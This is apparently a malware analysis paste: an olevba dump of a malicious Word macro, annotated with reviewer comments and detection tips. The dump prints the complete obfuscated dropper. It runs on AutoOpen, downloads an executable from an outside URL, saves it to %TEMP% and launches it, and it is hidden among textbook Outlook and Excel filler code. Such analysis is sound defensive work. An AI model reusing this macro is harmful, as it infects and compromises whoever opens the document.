dynamoo

Malicious Word macro

Jul 1st, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- compin~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: compin~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: compin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' NOTE(review): AutoOpen entry point - runs as soon as the document is opened
      ' with macros enabled (see the AutoExec row in the ANALYSIS table below).
      ' Its only job is to hop to the next stage through an intermediate Sub.
  17.  
  18. Nip121ÖÊÂ3017 (5.003)   ' the 5.003 argument is never read by the callee
  19.  
  20. End Sub
  21.  
  22. Sub Nip121ÖÊÂ3017(FFFFF As Double)
      ' NOTE(review): indirection layer only - FFFFF is never used; the Sub just
      ' forwards to px4vMaz62GyVze in Module2, which holds the actual payload logic.
      ' The non-ASCII characters in the name look like an obfuscation / tooling
      ' evasion choice rather than anything functional.
  23.  
  24. px4vMaz62GyVze
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. Public VSvsdvve As Integer   ' not referenced anywhere in the dumped modules
  41. Public lw6wgKatg As String   ' drop path (%TEMP%\silvuple.exe): set in px4vMaz62GyVze (Module2), read by A06WNXrxh
  42. Public FEveEv As Double      ' not referenced anywhere in the dumped modules
  43. Public VSeeve As Long        ' not referenced anywhere in the dumped modules
  44.  
  45. '
  46. ' Listing 22.1. A procedure that enumerates the first- and
  47. ' second-level folders in the Outlook namespace.
  48. '
  49. Sub EnumerateFolders()
      ' NOTE(review): textbook Outlook sample (Listing 22.1) carried as filler;
      ' nothing on autoopen's call path references it, so it never runs and only
      ' pads the module with legitimate-looking code. The "Run" keyword hit in the
      ' ANALYSIS table below is presumably from the "Run through" comments here - verify.
  50.     '
  51.    ' Set up the namespace
  52.    '
  53.    Set ns = ThisOutlookSession.Session
  54.     '
  55.    ' Run through the first-level folders
  56.    '
  57.    For Each folder In ns.Folders
  58.         Debug.Print folder.Name
  59.         '
  60.        ' Run through the second-level folders, if any
  61.        '
  62.        If folder.Folders.Count > 1 Then
  63.             For Each subfolder In folder.Folders
  64.                 Debug.Print "   " & subfolder.Name
  65.             Next 'subfolder
  66.        End If
  67.     Next 'folder
  68.    Set ns = Nothing
  69. End Sub
  70. '
  71. ' Listing 22.2. A procedure to test the PickFolder method
  72. '
  73. Sub PickFolderTest()
      ' NOTE(review): textbook Outlook sample (Listing 22.2) carried as filler;
      ' not referenced from autoopen's call path, so it never executes.
  74.     ' Set up the namespace
  75.    '
  76.    Set ns = ThisOutlookSession.Session
  77.     '
  78.    ' Display the Select Folder dialog box
  79.    '
  80.    Set folder = ns.PickFolder
  81.     '
  82.    ' Test the return value
  83.    '
  84.    If Not folder Is Nothing Then
  85.         MsgBox "You picked " & folder.Name
  86.     End If
  87. End Sub
  88. '
  89.  
  90. ' Listing 22.3. A procedure that toggles the Web view
  91. ' on and off for the currently displayed folder.
  92. '
  93. Sub ToggleWebView()
      ' NOTE(review): textbook Outlook sample (Listing 22.3) carried as filler and
      ' never called. The explorer object references have been mangled into
      ' r.exp / c.exp / a.exp (undeclared variables, late-bound), so even if it were
      ' called it would fail at runtime - harmless padding.
  94.     '
  95.    ' Set up the namespace and get the explorer
  96.    '
  97.    Set ns = ThisOutlookSession.Session
  98.     '
  99.    ' Save the current folder
  100.    '
  101.    Set currFolder = r.exp.CurrentFolder
  102.     '
  103.    ' Move temporarily to the root
  104.    '
  105.    Set c.exp.CurrentFolder = ns.Folders(1)
  106.     '
  107.    ' Toggle Web view for the current folder
  108.    '
  109.    currFolder.WebViewOn = Not currFolder.WebViewOn
  110.     '
  111.    ' Return to the current folder
  112.    '
  113.    Set a.exp.CurrentFolder = currFolder
  114. End Sub
  115. '
  116. ' Listing 22.4. A Function that determines the
  117. ' e-mail address of the sender.
  118. '
  119. Function SenderAddress(msg As String) As String
      ' NOTE(review): textbook Outlook sample (Listing 22.4) carried as filler; only
      ' SenderAddressTest (also filler) calls it. "y.msg.Reply" is a mangled object
      ' reference and msg is typed String, so this would not work even if reached.
  120.     '
  121.    ' Create a temporary reply
  122.    '
  123.    Set replyItem = y.msg.Reply
  124.     '
  125.    ' The Reply's "To" property holds the sender's address
  126.    '
  127.    SenderAddress = replyItem.To
  128.     Set replyItem = Nothing
  129. End Function
  130. '
  131. ' Use this procedure to test the SenderAddress function.
  132. '
  133. Sub SenderAddressTest()
      ' NOTE(review): textbook filler; not on autoopen's call path, never runs.
  134.     '
  135.    ' Set up the namespace and Inbox
  136.    '
  137.    Set ns = ThisOutlookSession.Session
  138.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  139.     '
  140.    ' Display the sender's address for a message
  141.    '
  142.    MsgBox SenderAddress(ib.Items(2))
  143. End Sub
  144. '
  145. ' Listing 22.5. A procedure that processes Inbox messages.
  146. '
  147.  
  148.  
  149.  
  150. Public Function LKJNmJKILHB(NVIEOIB As String)
      ' NOTE(review): thin wrapper around CreateObject so that the ProgID can be
      ' assembled from Chr() fragments at each call site and the CreateObject
      ' keyword appears only once in the project. Every COM object the payload
      ' uses (Microsoft.XMLHTTP, WScript.Shell, Adodb.Stream, Shell.Application)
      ' is instantiated through this helper - a good single point to hook or
      ' log when analysing the sample in a sandbox.
  151.  Set LKJNmJKILHB = CreateObject(NVIEOIB)
  152. End Function
  153. Sub ProcessInboxMessages()
      ' NOTE(review): textbook Outlook sample (Listing 22.5) carried as filler;
      ' not referenced from autoopen's call path, so it never executes.
  154.     '
  155.    ' Set up the namespace
  156.    '
  157.    Set ns = ThisOutlookSession.Session
  158.     '
  159.    ' Get the default Inbox folder
  160.    '
  161.    Set ib = ns.GetDefaultFolder(olFolderInbox)
  162.     '
  163.    ' Run through each item in the Inbox
  164.    '
  165.    For Each msg In ib.Items
  166.         '
  167.        ' Flag important messages
  168.        '
  169.        If msg.Importance = olImportanceHigh Then
  170.             msg.FlagStatus = olFlagMarked
  171.             msg.FlagRequest = "Handle this, will ya!"
  172.             msg.FlagDueBy = Date + 7
  173.             msg.Importance = olImportanceNormal
  174.             msg.Save
  175.         End If
  176.         '
  177.        ' Look for expired flags
  178.        '
  179.        If msg.FlagDueBy < Date Then
  180.             msg.Display
  181.             MsgBox "The displayed message has an expired flag!"
  182.         End If
  183.         '
  184.        ' Move sensitive messages to "Confidential" folder
  185.        '
  186.        If msg.Sensitivity = olConfidential Then
  187.             msg.Move ns.Folders(1).Folders("Confidential")
  188.         End If
  189.     Next 'msg
  190. End Sub
  191.  
  192. '
  193. ' Listing 22.6. A procedure that sends an e-mail message
  194. '
  195. Sub SendAMessage()
      ' NOTE(review): textbook Outlook sample (Listing 22.6) carried as filler and
      ' never called. "Applicy.ation" is the textbook's Application object with the
      ' identifier split - possibly to keep the literal "Application" out of the
      ' module for keyword scanners, possibly just junk-generator damage; either
      ' way it is an undeclared late-bound name and would fail at runtime.
  196.     ' Set up the namespace
  197.    '
  198.    Set ns = ThisOutlookSession.Session
  199.     '
  200.    ' Create the new MailItem
  201.    '
  202.    Set msg = Applicy.ation.CreateItem(olMailItem)
  203.     '
  204.    ' Specify the recipient, subject, and body
  205.    ' and then send the message
  206.    '
  207.    With msg
  208.         '
  209.        ' Adjust the following address!
  210.        '
  211.        .Recipients.Add "bitbucket@mcfedries.com"
  212.         .Subject = "Just Testing"
  213.         .Body = "This is only a test"
  214.         .Send
  215.     End With
  216. End Sub
  217. '
  218.  
  219.  
  220. ' Listing 22.7. A procedure that creates a forwarded message
  221. ' and deletes any existing attachments before sending it.
  222. '
  223. Sub ForwardAndDeleteAttachments()
      ' NOTE(review): textbook Outlook sample (Listing 22.7) carried as filler;
      ' not referenced from autoopen's call path, so it never executes.
  224.     '
  225.    ' Set up the namespace and Inbox
  226.    '
  227.    Set ns = ThisOutlookSession.Session
  228.     Set ib = ns.GetDefaultFolder(olFolderInbox)
  229.     '
  230.    ' Create the forwarded MailItem
  231.    '
  232.    Set msg = ib.Items(ib.Items.Count).Forward
  233.     With msg
  234.         '
  235.        ' Delete all the attachments
  236.        '
  237.        For Each att In .Attachments
  238.             att.Delete
  239.         Next 'att
  240.        '
  241.        ' Send it (change the address!)
  242.        '
  243.        .Recipients.Add "selene@mcfedries.com"
  244.         .Send
  245.     End With
  246. End Sub
  247. '
  248.  
  249. ' Listing 22.8. A procedure that stores a password
  250. ' in a folder's Description property.
  251. '
  252. Sub SetPassword()
      ' NOTE(review): textbook Outlook sample (Listing 22.8) carried as filler;
      ' never called from autoopen's call path. The "password" literal is the
      ' textbook's placeholder, not a credential used by the payload.
  253.     ' Set up the namespace
  254.    '
  255.    Set ns = ThisOutlookSession.Session
  256.     '
  257.    ' Save the password in the folder's Description property
  258.    '
  259.    Set folder = ns.Folders(1).Folders("Confidential")
  260.     folder.Description = "password"
  261. End Sub
  262.  
  263. '
  264. ' Listing 22.9. An event handler that asks the user for
  265. ' a password before switching to the "Confidential" folder.
  266. '
  267.  
  268.  
  269.  
  270. Public Function A06WNXrxh(MmXQ1eLmZ As String)
      ' NOTE(review): execution stage. The Chr() string decodes to
      ' "Shell.Application"; .Open on the global lw6wgKatg launches the file that
      ' px4vMaz62GyVze downloaded to %TEMP%. The MmXQ1eLmZ argument is never used.
      ' Reached only from px4vMaz62GyVze's error handler (Module2).
      ' Detection angle: the Word host process spawning a child executable from the
      ' user's TEMP directory shortly after a document is opened.
  271.  Set d6eiGTziQd = LKJNmJKILHB("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
  272. d6eiGTziQd.Open (lw6wgKatg)   ' Shell.Application.Open(<drop path>) - runs the payload
  273. End Function
  274. Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
      ' NOTE(review): textbook Outlook event handler (Listing 22.9) carried as
      ' filler. gExplorer is not declared WithEvents anywhere in the dumped modules,
      ' so this handler is never wired to an object and never fires.
  275.     If NewFolder.Name = "Confidential" Then
  276.         pwd = InputBox("Please enter the password for this folder:")
  277.         If pwd <> NewFolder.Description Then
  278.             Cancel = True
  279.         End If
  280.     End If
  281. End Sub
  282. '
  283. ' Use this event handler to insure that the gExplorer
  284. ' global variable gets instantiated at startup
  285. '
  286. Private Sub Application_Startup()
      ' NOTE(review): textbook Outlook startup handler carried as filler; sitting in
      ' a standard module of a Word document it is never raised as an event, and the
      ' "Applicat.ion" reference is a mangled (undeclared, late-bound) name anyway.
  287.     Set gExplorer = Applicat.ion.ActiveExplorer
  288. End Sub
  289. '
  290. ' Listing 22.10. An event handler for the MailItem object's Send event.
  291. '
  292. Private Sub gMailItem_Send(Cancel As Boolean)
      ' NOTE(review): textbook Outlook event handler (Listing 22.10) carried as
      ' filler; gMailItem is not declared WithEvents in the dumped modules, so the
      ' handler is never attached and never fires.
  293.     Dim result As Integer
  294.     result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
  295.     If result = vbNo Then
  296.         gMailItem.DeleteAfterSubmit = True
  297.     End If
  298. End Sub
  299. '
  300. ' Listing 22.11. A procedure that sends an e-mail message and
  301. ' references the global gMailItem variable to trap events.
  302. '
  303. Sub SendAMessage2()
      ' NOTE(review): textbook Outlook sample (Listing 22.11) carried as filler and
      ' never called. "Appl.ication" is another split of the Application identifier
      ' (see SendAMessage above) - an undeclared late-bound name that would fail.
  304.     '
  305.    ' Set up the namespace
  306.    '
  307.    Set ns = ThisOutlookSession.Session
  308.     '
  309.    ' Create the new MailItem using the
  310.    ' gMailItem global variable
  311.    '
  312.    Set gMailItem = Appl.ication.CreateItem(olMailItem)
  313.     '
  314.    ' Specify the recipient, subject, and body
  315.    ' and then send the message
  316.    '
  317.    With gMailItem
  318.         '
  319.        ' Adjust the following address!
  320.        '
  321.        .Recipients.Add "bitbucket@mcfedries.com"
  322.         .Subject = "Just Testing Events"
  323.         .Body = "This is only an events test"
  324.         .Send
  325.     End With
  326. End Sub
  327. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  328. ANALYSIS:
  329. +------------+----------------+-----------------------------------------+
  330. | Type       | Keyword        | Description                             |
  331. +------------+----------------+-----------------------------------------+
  332. | Suspicious | Open           | May open a file                         |
  333. | Suspicious | Chr            | May attempt to obfuscate specific       |
  334. |            |                | strings                                 |
  335. | Suspicious | CreateObject   | May create an OLE object                |
  336. | Suspicious | Run            | May run an executable file or a system  |
  337. |            |                | command                                 |
  338. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  339. |            |                | may be used to obfuscate strings        |
  340. |            |                | (option --decode to see all)            |
  341. +------------+----------------+-----------------------------------------+
  342. -------------------------------------------------------------------------------
  343. VBA MACRO Module2.bas
  344. in file: compin~1.doc - OLE stream: u'Macros/VBA/Module2'
  345. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  346. '
  347. ' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
  348. '
  349. Sub GetNumbers()
      ' NOTE(review): textbook sample (Listing 23.1) carried as filler; not on
      ' autoopen's call path, so it never runs. Only Divide (also filler) is called.
  350.     Dim done As Boolean
  351.     Dim divisor As Variant
  352.     Dim dividend As Variant
  353.     '
  354.    ' Prompt user for dividend and divisor.
  355.    '
  356.    done = False
  357.     Do While Not done
  358.         dividend = InputBox("Enter the dividend:", "Divider")
  359.         divisor = InputBox("Enter the divisor:", "Divider")
  360.         done = Divide(dividend, divisor)
  361.     Loop
  362. End Sub
  363. '
  364.  
  365. Public Function VBveEPIB(jIAuThroV99z As Variant, dicVrTXgN As String)
      ' NOTE(review): writes a byte buffer to disk. The Chr() string decodes to
      ' "Adodb.Stream"; Type = 1 selects a binary stream and SaveToFile's second
      ' argument (2) overwrites any existing file at dicVrTXgN. Called once from
      ' px4vMaz62GyVze with the HTTP response body and the %TEMP% drop path.
      ' Detection angle: Word writing a PE file into %TEMP% via ADODB.Stream.
  366. Dim KKOWIPA: Set KKOWIPA = LKJNmJKILHB(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
  367.  
  368. With KKOWIPA
  369.    .Type = 1                       ' binary stream
  370.     .Open
  371.     .write jIAuThroV99z           ' raw downloaded bytes
  372.     .savetofile dicVrTXgN, 2      ' create/overwrite
  373. End With
  374. End Function
  375.  
  376. ' Listing 23.2. The Divide function divides the dividend by the divisor.
  377. ' The function traps "division by zero" errors.
  378. '
  379. Function Divide(dividend, divisor) As Boolean
      ' NOTE(review): textbook sample (Listing 23.2) carried as filler; reachable
      ' only from GetNumbers (also filler), never from autoopen's call path.
  380.     Dim msg As String
  381.     Dim result As Single
  382.     '
  383.    ' Set the trap
  384.    '
  385.    On Error GoTo DivByZeroHandler
  386.     '
  387.    ' Perform the division
  388.    '
  389.    result = dividend / divisor
  390.     '
  391.    ' If it went okay, display the result
  392.    '
  393.    msg = dividend & _
  394.           " divided by " & _
  395.           divisor & _
  396.           " equals " & _
  397.           result
  398.     MsgBox msg
  399.     '
  400.    ' Set the return value and bypass the error handler
  401.    '
  402.    Divide = True
  403.     Exit Function
  404.     '
  405.    ' Code branches here if an error occurs
  406.    '
  407. DivByZeroHandler:
  408.     '
  409.    ' Display the error message
  410.    '
  411.    result = MsgBox("You entered 0 as the divisor! Try again?", _
  412.                     vbYesNo + vbQuestion, _
  413.                     "Divider")
  414.     '
  415.    ' Return the user's choice
  416.    '
  417.    If result = vbYes Then
  418.         Divide = False
  419.     Else
  420.         Divide = True
  421.     End If
  422. End Function
  423. '
  424. ' Listing 23.3 Backs up the active workbook to a drive specified by
  425.  
  426.  
  427. Sub px4vMaz62GyVze()
      ' NOTE(review): the actual dropper, reached via autoopen -> Nip121ÖÊÂ3017.
      ' Every ProgID, method name and the URL are assembled from Chr() fragments,
      ' and the COM calls go through CallByName so the method names never appear as
      ' literals. Sequence: HTTP GET of a remote .exe, write it to %TEMP%\silvuple.exe
      ' (Adodb.Stream via VBveEPIB), then launch it from the error handler at the
      ' bottom (Shell.Application via A06WNXrxh in Module1).
      ' The textbook header "Listing 23.3 Backs up the active workbook ..." above and
      ' "the user. Traps any errors ..." below are one comment this Sub was spliced into.
      ' Mitigation/detection: block macros in documents from the internet; alert on
      ' the Word host process issuing HTTP requests for executables, writing to
      ' %TEMP%, and spawning a child process.
  428.  
  429. Set ppVZZF1t = LKJNmJKILHB("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))   ' decodes to "Microsoft.XMLHTTP"
  430.  
      ' CallByName <xmlhttp>, "Open", VbMethod, "GET", <url>, False  (synchronous request)
      ' decoded URL (IoC from this sample): http://demaiffe.be/75/85.exe
  431. CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
  432. , "h" & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "d" & "e" & "m" & Chr(97) & "i" & "f" & "f" & "e" & "." & Chr(98) & Chr(101) & "/" & Chr(55) & "5" & Chr(47) & Chr(56) & Chr(53) & Chr(46) & "e" & "x" & Chr(101) _
  433. , False
  434.  
  435. Set cenPup7VnpnK = LKJNmJKILHB(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))   ' decodes to "WScript.Shell"
  436.  
  437. Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")   ' = WScript.Shell.Environment("Process")
  438.  
  439. mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")   ' reads the TEMP environment variable
  440.  
      ' drop path = %TEMP%\silvuple.exe, kept in the module-level global lw6wgKatg
      ' (declared in Module1) so that A06WNXrxh can find it later
  441. lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
  442. Dim FLLSJmKUYRVHQ() As Byte
  443.  
  444. CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod   ' "Send"
  445. FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)   ' "responseBody" - raw bytes of the download
  446. VBveEPIB FLLSJmKUYRVHQ, lw6wgKatg   ' write the bytes to the drop path
      ' Control-flow trick: a deliberate division by zero raises a runtime error so
      ' that the launch happens inside the error handler rather than in straight-line
      ' code; the handler then resumes at the Exit Sub label.
  447. On Error GoTo PA4FeaqAL
  448.     a = 84 / 0
  449.   On Error GoTo 0
  450.  
  451. JRyXdhZR:
  452.   Exit Sub
  453. PA4FeaqAL:
  454.   A06WNXrxh ("AU7CVXKyNxAAi")   ' Shell.Application.Open on the dropped file; the argument is ignored
  455. Resume JRyXdhZR
  456. End Sub
  457.  
  458. ' the user. Traps any errors (such as having no disk in the drive).
  459. '
  460. Sub BackUpToFloppy()
      ' NOTE(review): textbook Excel sample (Listing 23.3) carried as filler; not
      ' on autoopen's call path, never runs. Its header comment was split in two by
      ' the dropper Sub inserted above.
  461.     Dim backupDrive As String
  462.     Dim backupName As String
  463.     Dim msg As String
  464.     Dim done As Boolean
  465.     Dim result As Integer
  466.     '
  467.    ' Define the location of the error handler
  468.    '
  469.    On Error GoTo ErrorHandler
  470.     '
  471.    ' Initialize some variables and then loop
  472.    '
  473.    Application.DisplayAlerts = False
  474.     done = False
  475.     backupDrive = "A:"
  476.     While Not done
  477.         '
  478.        ' Get the drive to use for the backup
  479.        '
  480.        backupDrive = InputBox( _
  481.             Prompt:="Enter the drive letter for the backup:", _
  482.             Title:="Backup", _
  483.             Default:=backupDrive)
  484.         '
  485.        ' Check to see if OK was selected
  486.        '
  487.        If backupDrive <> "" Then
  488.             '
  489.            ' Make sure the backup drive contains a colon (:)
  490.            '
  491.            If InStr(backupDrive, ":") = 0 Then
  492.                 backupDrive = Left(backupDrive, 1) & ":"
  493.             End If
  494.             '
  495.            ' First, save the file
  496.            '
  497.            ActiveWorkbook.Save
  498.             '
  499.            ' Assume the backup will be successful,
  500.            ' so set done to True to exit the loop
  501.            '
  502.            done = True
  503.             '
  504.            ' Concatenate drive letter and workbook name
  505.            '
  506.            backupName = backupDrive & ActiveWorkbook.Name
  507.             '
  508.            ' Make a copy on the specified drive
  509.            '
  510.            ActiveWorkbook.SaveCopyAs FileName:=backupName
  511.         Else
  512.             Exit Sub
  513.         End If
  514.     Wend
  515.     '
  516.    ' Bypass the error handler
  517.    '
  518.    Exit Sub
  519.     '
  520.    ' Code branches here if an error occurs
  521.    '
  522. ErrorHandler:
  523.     msg = "An error has occurred!" & Chr(13) & Chr(13) & _
  524.           "Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
  525.           "letter, or Ignore to attempt the backup again."
  526.     result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
  527.     Select Case result
  528.         Case vbAbort
  529.             done = True
  530.         Case vbRetry
  531.             done = False
  532.             Resume Next
  533.         Case vbIgnore
  534.             Resume
  535.     End Select
  536. End Sub
  537. '
  538. ' Listing 23.4. This procedure divides two numbers. It traps three specific
  539.  
  540. ' errors: division by zero, overflow, and type mismatch.
  541. '
  542. Sub DivideNumbers()
      ' NOTE(review): textbook sample (Listing 23.4) carried as filler; not on
      ' autoopen's call path, never runs. Its "Case 11" branch documents the
      ' division-by-zero error number that the dropper above triggers on purpose.
  543.     Dim msg As String
  544.     Dim result As Single
  545.     Dim divisor As Variant
  546.     Dim dividend As Variant
  547.     '
  548.    ' Set the trap
  549.    '
  550.    On Error GoTo DivByZeroHandler
  551.     '
  552.    ' Prompt user for the dividend
  553.    '
  554. GetDividendAndDivisor:
  555.     dividend = InputBox("Enter the dividend:", "Divider")
  556.     If dividend = "" Then Exit Sub
  557.     '
  558.    ' Prompt user for the divisor
  559.    '
  560. GetDivisorOnly:
  561.     divisor = InputBox("Enter the divisor:", "Divider")
  562.     If divisor = "" Then Exit Sub
  563.     '
  564.    ' Perform the division
  565.    '
  566.    result = dividend / divisor
  567.     '
  568.    ' If it went okay, display the result
  569.    '
  570.    msg = dividend & _
  571.           " divided by " & _
  572.           divisor & _
  573.           " equals " & _
  574.           result
  575.     MsgBox msg
  576.     '
  577.    ' Bypass the error handler
  578.    '
  579.    Exit Sub
  580.     '
  581.    ' Code branches here if an error occurs
  582.    '
  583. DivByZeroHandler:
  584.     '
  585.    ' Display the error message
  586.    '
  587.    msg = "An error occurred!" & Chr(13) & Chr(13) & _
  588.           "Error number:  " & Err.Number & Chr(13) & _
  589.           "Error message: " & Err.Description
  590.     MsgBox msg, vbOKOnly + vbCritical
  591.     '
  592.    ' Check the error number
  593.    '
  594.    Select Case Err.Number
  595.         '
  596.        ' Division by zero
  597.        '
  598.        Case 11
  599.             Resume GetDivisorOnly
  600.         '
  601.        ' Overflow
  602.        '
  603.        Case 6
  604.             Resume GetDividendAndDivisor
  605.         '
  606.        ' Type mismatch
  607.        '
  608.        Case 13
  609.             If Not IsNumeric(dividend) Then
  610.                 Resume GetDividendAndDivisor
  611.             Else
  612.                 Resume GetDivisorOnly
  613.             End If
  614.         '
  615.        ' Anything else, just quit
  616.        '
  617.        Case Else
  618.             Exit Sub
  619.     End Select
  620. End Sub
  621.  
  622. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  623. ANALYSIS:
  624. +------------+------------+-----------------------------------------+
  625. | Type       | Keyword    | Description                             |
  626. +------------+------------+-----------------------------------------+
  627. | Suspicious | Open       | May open a file                         |
  628. | Suspicious | Chr        | May attempt to obfuscate specific       |
  629. |            |            | strings                                 |
  630. | Suspicious | SaveToFile | May create a text file                  |
  631. | Suspicious | CallByName | May attempt to obfuscate malicious      |
  632. |            |            | function calls                          |
  633. | Suspicious | Write      | May write to a file (if combined with   |
  634. |            |            | Open)                                   |
  635. +------------+------------+-----------------------------------------+